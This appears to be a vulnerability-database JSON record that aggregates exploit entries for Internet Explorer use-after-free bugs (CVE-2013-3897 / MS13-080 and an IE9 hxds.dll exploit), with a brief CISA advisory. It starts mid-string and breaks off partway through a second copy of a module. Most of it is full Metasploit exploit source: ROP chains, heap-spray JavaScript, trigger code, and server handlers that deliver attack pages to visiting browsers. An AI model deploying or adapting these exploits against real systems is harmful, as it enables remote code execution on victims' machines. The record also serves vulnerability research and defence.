checka) == \"object\" && (typeof checkb) == \"object\") {\r\n return \"office2010\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n return \"office2007\";\r\n }\r\n\r\n return \"na\";\r\n }\r\n\r\n window.onload = function() {\r\n document.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL();\r\n }\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(rop_dll)\r\n code = payload.encoded\r\n rop = ''\r\n p = ''\r\n\r\n case rop_dll\r\n when :office2007\r\n rop = \r\n [\r\n junk, # Alignment\r\n 0x51c46f91, # POP EBP # RETN [hxds.dll] \r\n 0x51c46f91, # skip 4 bytes [hxds.dll]\r\n 0x51c35a4d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bfa98e, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51c55c45, # DEC EAX, RETN [hxds.dll]\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c4c17c, # POP ECX # RETN [hxds.dll]\r\n 0xffffffc0,\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c05766, # POP EDI # RETN [hxds.dll] \r\n 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c2e77d, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc840, # JMP [EAX] [hxds.dll]\r\n 0x51c05266, # POP EAX # RETN [hxds.dll] \r\n 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51bdf91f, # PUSHAD # RETN [hxds.dll] \r\n 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n\r\n when :office2010\r\n rop = \r\n [\r\n # 4 dword junks due to the add esp in stack pivot\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51c41953, # POP EBP # RETN [hxds.dll]\r\n 0x51be3a03, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c41953, # skip 4 bytes [hxds.dll]\r\n 0x51c4486d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bfa298, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51bd5382, # DEC EAX # RETN [hxds.dll]\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1f094, # POP ECX # RETN [hxds.dll] \r\n 0xffffffc0,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf1ff0, # POP EDI # RETN [hxds.dll] \r\n 0x51bd5383, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c07c8b, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc7cb, # JMP [EAX] [hxds.dll]\r\n 0x51c44707, # POP EAX # RETN [hxds.dll] \r\n 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51c3604e, # PUSHAD # RETN [hxds.dll] \r\n 0x51c541ef, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n end\r\n\r\n p = rop + code\r\n p\r\n end\r\n\r\n def get_exploit_html(cli, req, rop_dll)\r\n gadgets = {}\r\n case rop_dll\r\n when :office2007\r\n gadgets[:spray1] = 0x1af40020\r\n\r\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x3160ff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1ce8\r\n\r\n # xchg eax,esp\r\n # add byte [eax], al\r\n # pop esi\r\n # mov [edi+23c], ebp\r\n # mov [edi+238], ebp\r\n # mov [edi+234], ebp\r\n # pop ebp\r\n # pop ebx\r\n # ret\r\n gadgets[:pivot] = 0x51be4418\r\n\r\n when :office2010\r\n gadgets[:spray1] = 0x1a7f0020\r\n\r\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x301fff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1a41\r\n\r\n # xchg eax,esp\r\n # add eax,dword ptr [eax]\r\n # add esp,10\r\n # mov eax,esi\r\n # pop esi\r\n # pop ebp # retn 4\r\n gadgets[:pivot] = 0x51c00e64\r\n end\r\n\r\n p1 =\r\n [\r\n gadgets[:target], # Target address\r\n gadgets[:pivot] # stack pivot\r\n ].pack(\"V*\")\r\n\r\n p1 << get_payload(rop_dll)\r\n\r\n p2 =\r\n [\r\n gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\r\n ].pack(\"V*\")\r\n\r\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\r\n js_p1 = Rex::Text.to_unescape(p1)\r\n js_p2 = Rex::Text.to_unescape(p2)\r\n\r\n %Q|\r\n<html>\r\n<script>\r\n#{js_property_spray}\r\n\r\nfunction loadOffice() {\r\n try{location.href='ms-help://'} catch(e){}\r\n}\r\n\r\nvar a = new Array();\r\nfunction spray() {\r\n var obj = '';\r\n for (i=0; i<20; i++) {\r\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\r\n else { obj += \"\\\\u4242\\\\u4242\"; }\r\n }\r\n obj += \"\\\\u5555\";\r\n\r\n for (i=0; i<10; i++) {\r\n var e = document.createElement(\"div\");\r\n e.className = obj;\r\n a.push(e);\r\n }\r\n\r\n var s1 = unescape(\"#{js_p1}\");\r\n sprayHeap({shellcode:s1, maxAllocs:0x300});\r\n var s2 = unescape(\"#{js_p2}\");\r\n sprayHeap({shellcode:s2, maxAllocs:0x300});\r\n}\r\n\r\nfunction hit()\r\n{\r\n var id_0 = document.createElement(\"sup\");\r\n var id_1 = document.createElement(\"audio\");\r\n\r\n document.body.appendChild(id_0);\r\n document.body.appendChild(id_1);\r\n id_1.applyElement(id_0);\r\n\r\n id_0.onlosecapture=function(e) {\r\n document.write(\"\");\r\n spray();\r\n }\r\n\r\n id_0['outerText']=\"\";\r\n id_0.setCapture();\r\n id_1.setCapture();\r\n}\r\n\r\nfor (i=0; i<20; i++) {\r\n document.createElement(\"frame\");\r\n}\r\n\r\nwindow.onload = function() {\r\n loadOffice();\r\n hit();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n unless is_win7_ie9?(agent)\r\n print_error(\"Not a suitable target: #{agent}\")\r\n send_not_found(cli)\r\n end\r\n\r\n html = ''\r\n if request.uri =~ /\\?dll=(\\w+)$/\r\n rop_dll = ''\r\n if $1 == 'office2007'\r\n print_status(\"Using Office 2007 ROP chain\")\r\n rop_dll = :office2007\r\n elsif $1 == 'office2010'\r\n print_status(\"Using Office 2010 ROP chain\")\r\n rop_dll = :office2010\r\n else\r\n print_error(\"Target does not have Office installed\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = get_exploit_html(cli, request, rop_dll)\r\n else\r\n print_status(\"Checking target requirements...\")\r\n html = get_preq_html(cli, request)\r\n end\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @exploit_page = \"default.html\"\r\n super\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\nhxds.dll (Microsoft\u00ae Help Data Services Module)\r\n\r\n 2007 DLL info:\r\n ProductVersion: 2.05.50727.198\r\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\r\n\r\n 2010 DLL info:\r\n ProductVersion: 2.05.50727.4039\r\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\r\n\r\nmshtml.dll\r\n ProductVersion: 9.00.8112.16446\r\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\r\n FileDescription: Microsoft (R) HTML Viewer\r\n\r\n\r\n0:005> r\r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\r\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nMSHTML!CTreeNode::GetInterface+0xd8:\r\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\r\n\r\n\r\n66e13df7 8b0e mov ecx,dword ptr [esi]\r\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\r\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\r\n66e13e01 ffd0 call eax\r\n\r\n=end\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21313"}, {"lastseen": "2018-01-03T04:59:46", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer object can be forced by using an \"Unslect\" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.", "edition": 2, "published": "2013-10-15T00:00:00", "type": "zdt", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "modified": "2013-10-15T00:00:00", "id": "1337DAY-ID-21380", "href": "https://0day.today/exploit/description/21380", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"8.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\r\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\r\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\r\n multiple research companies and the vendor until the October patch release.\r\n\r\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\r\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\r\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\r\n If we use a select() function for the CTextArea element, two important things will happen:\r\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\r\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\r\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\r\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\r\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\r\n object can be forced by using an \"Unslect\" (other approaches also apply), but a reference\r\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\r\n the CDoc::GetLineInfo call, because it is still trying to use that to update\r\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\r\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\r\n possible to achieve arbitrary code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3897' ],\r\n [ 'OSVDB', '98207' ],\r\n [ 'MSB', 'MS13-080' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\r\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', {} ],\r\n [ 'IE 8 on Windows 7', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n # Jsunpack first received a sample to analyze on Sep 12 2013.\r\n # MSFT patched this on Oct 8th.\r\n 'DisclosureDate' => \"Oct 08 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def get_check_html\r\n %Q|<html>\r\n<script>\r\n#{js_os_detect}\r\n\r\nfunction os() {\r\n var detect = window.os_detect.getVersion();\r\n var os_string = detect.os_name + \" \" + detect.os_flavor + \" \" + detect.ua_name + \" \" + detect.ua_version;\r\n return os_string;\r\n}\r\n\r\nfunction dll() {\r\n var checka = 0;\r\n var checkb = 0;\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return \"#{@js_office_2010_str}\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return \"#{@js_office_2007_str}\";\r\n }\r\n return \"#{@js_default_str}\";\r\n}\r\n\r\nwindow.onload = function() {\r\n window.location = \"#{get_resource}/search?o=\" + escape(os()) + \"&d=\" + dll();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(target_info)\r\n rop_payload = ''\r\n os = target_info[:os]\r\n dll_used = ''\r\n\r\n case target_info[:dll]\r\n when @js_office_2007_str\r\n dll_used = \"Office 2007\"\r\n\r\n pivot =\r\n [\r\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\r\n junk, # ESI due to POPAD\r\n junk, # EBP due to POPAD\r\n junk,\r\n junk, # EBX due to POPAD\r\n junk, # EDX due to POPAD\r\n junk, # ECX due to POPAD\r\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\r\n 0x51bd81db, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\r\n\r\n when @js_office_2010_str\r\n dll_used = \"Office 2010\"\r\n\r\n pivot =\r\n [\r\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51BE7E9A, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\r\n\r\n when @js_default_str\r\n if target_info[:os] =~ /windows xp/i\r\n # XP uses msvcrt.dll\r\n dll_used = \"msvcrt\"\r\n\r\n pivot =\r\n [\r\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\r\n else\r\n # Assuming this is Win 7, and we'll use Java 6 ROP\r\n dll_used = \"Java\"\r\n\r\n pivot =\r\n [\r\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\r\n junk # Padding for the POP ECX\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\r\n end\r\n end\r\n\r\n print_status(\"Target uses #{os} with #{dll_used} DLL\")\r\n\r\n rop_payload\r\n end\r\n\r\n def get_sploit_html(target_info)\r\n os = target_info[:os]\r\n js_payload = ''\r\n\r\n if os =~ /Windows (7|XP) MSIE 8\\.0/\r\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\r\n else\r\n print_error(\"Target not supported by this attack.\")\r\n return \"\"\r\n end\r\n\r\n %Q|<html>\r\n<head>\r\n<script>\r\n#{js_property_spray}\r\nsprayHeap({shellcode:unescape(\"#{js_payload}\")});\r\n\r\nvar earth = document;\r\nvar data = \"\";\r\nfor (i=0; i<17; i++) {\r\n if (i==7) { data += unescape(\"%u2020%u2030\"); }\r\n else { data += \"\\\\u4141\\\\u4141\"; }\r\n}\r\ndata += \"\\\\u4141\";\r\n\r\nfunction butterfly() {\r\n for(i=0; i<20; i++) {\r\n var effect = earth.createElement(\"div\");\r\n effect.className = data;\r\n }\r\n}\r\n\r\nfunction kaiju() {\r\n var godzilla = earth.createElement(\"textarea\");\r\n var minilla = earth.createElement(\"pre\");\r\n earth.body.appendChild(godzilla);\r\n earth.body.appendChild(minilla);\r\n godzilla.appendChild(minilla);\r\n\r\n godzilla.onselect=function(e) {\r\n minilla.swapNode(earth.createElement(\"div\"));\r\n }\r\n\r\n var battleStation = false;\r\n var war = new Array();\r\n godzilla.onpropertychange=function(e) {\r\n if (battleStation == true) {\r\n for (i=0; i<50; i++) {\r\n war.push(earth.createElement(\"span\"));\r\n }\r\n }\r\n\r\n earth.execCommand(\"Unselect\");\r\n\r\n if (battleStation == true) {\r\n for (i=0; i < war.length; i++) {\r\n war[i].className = data;\r\n }\r\n }\r\n else {\r\n battleStation = true;\r\n }\r\n }\r\n\r\n butterfly();\r\n godzilla.select();\r\n}\r\n</script>\r\n</head>\r\n<body onload='kaiju()'>\r\n</body>\r\n</html>\r\n |\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\r\n target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }\r\n sploit = get_sploit_html(target_info)\r\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n return\r\n end\r\n\r\n html = get_check_html\r\n print_status(\"Checking out target...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\r\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\r\n @js_default_str = Rex::Text.rand_text_alpha(6)\r\n super\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n+hpa this for debugging or you might not see a crash at all :-)\r\n\r\n0:005> r\r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\r\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\r\n0:005> u\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx]\r\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\r\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\r\n6d6dc12c 51 push ecx\r\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\r\n6d6dc132 53 push ebx\r\n6d6dc133 bf02400080 mov edi,80004002h\r\n6d6dc138 ff10 call dword ptr [eax]\r\n\r\n=end\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21380"}], "cisa": [{"lastseen": "2021-02-24T18:06:56", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "Microsoft has released [Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>) regarding a remote code execution vulnerability ([CVE-2013-3893](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>)) impacting Internet Explorer versions 6 through 11. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability in Internet Explorer 8 and Internet Explorer 9. The Microsoft Fix it solution, \"CVE-2013-3893 MSHTML Shim Workaround,\" prevents exploitation of this issue.\n\nUS-CERT encourages administrators to review Microsoft Security Advisory [2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>) and Knowledge Base article [2887505](<https://support.microsoft.com/kb/2887505>) and follow best practice security policies to determine which updates should be applied.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2013/09/18/Microsoft-Releases-Security-Advisory-Internet-Explorer>); we'd welcome your feedback.\n", "modified": "2013-09-18T00:00:00", "published": "2013-09-18T00:00:00", "id": "CISA:E8896EEDE5B9416FC85CCCAA2017E96A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2013/09/18/Microsoft-Releases-Security-Advisory-Internet-Explorer", "type": "cisa", "title": "Microsoft Releases Security Advisory for Internet Explorer", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-02-24T17:07:43", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer object can be forced by using an \"Unselect\" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.\n", "published": "2013-10-12T18:01:17", "type": "metasploit", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => NormalRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3897' ],\n [ 'OSVDB', '98207' ],\n [ 'MSB', 'MS13-080' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows 7', {} ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500\n },\n 'DefaultOptions' =>\n {\n #'PrependMigrate' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n # Jsunpack first received a sample to analyze on Sep 12 2013.\n # MSFT patched this on Oct 8th.\n 'DisclosureDate' => '2013-10-08',\n 'DefaultTarget' => 0))\n end\n\n def get_check_html\n %Q|<html>\n<script>\n#{js_base64}\n#{js_os_detect}\n\nfunction os() {\n var detect = window.os_detect.getVersion();\n var os_string = detect.os_name + \" \" + detect.ua_name + \" \" + detect.ua_version;\n return os_string;\n}\n\nfunction dll() {\n var checka = 0;\n var checkb = 0;\n try {\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\n } catch (e) {}\n\n try {\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\n } catch (e) {}\n\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2010_str}\";\n }\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2007_str}\";\n }\n return \"#{@js_default_str}\";\n}\n\nwindow.onload = function() {\n window.location = \"#{get_uri.chomp(\"/\")}/search?o=\" + escape(Base64.encode(os())) + \"&d=\" + dll();\n}\n</script>\n</html>\n |\n end\n\n def junk\n rand_text_alpha(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(target_info)\n rop_payload = ''\n os = 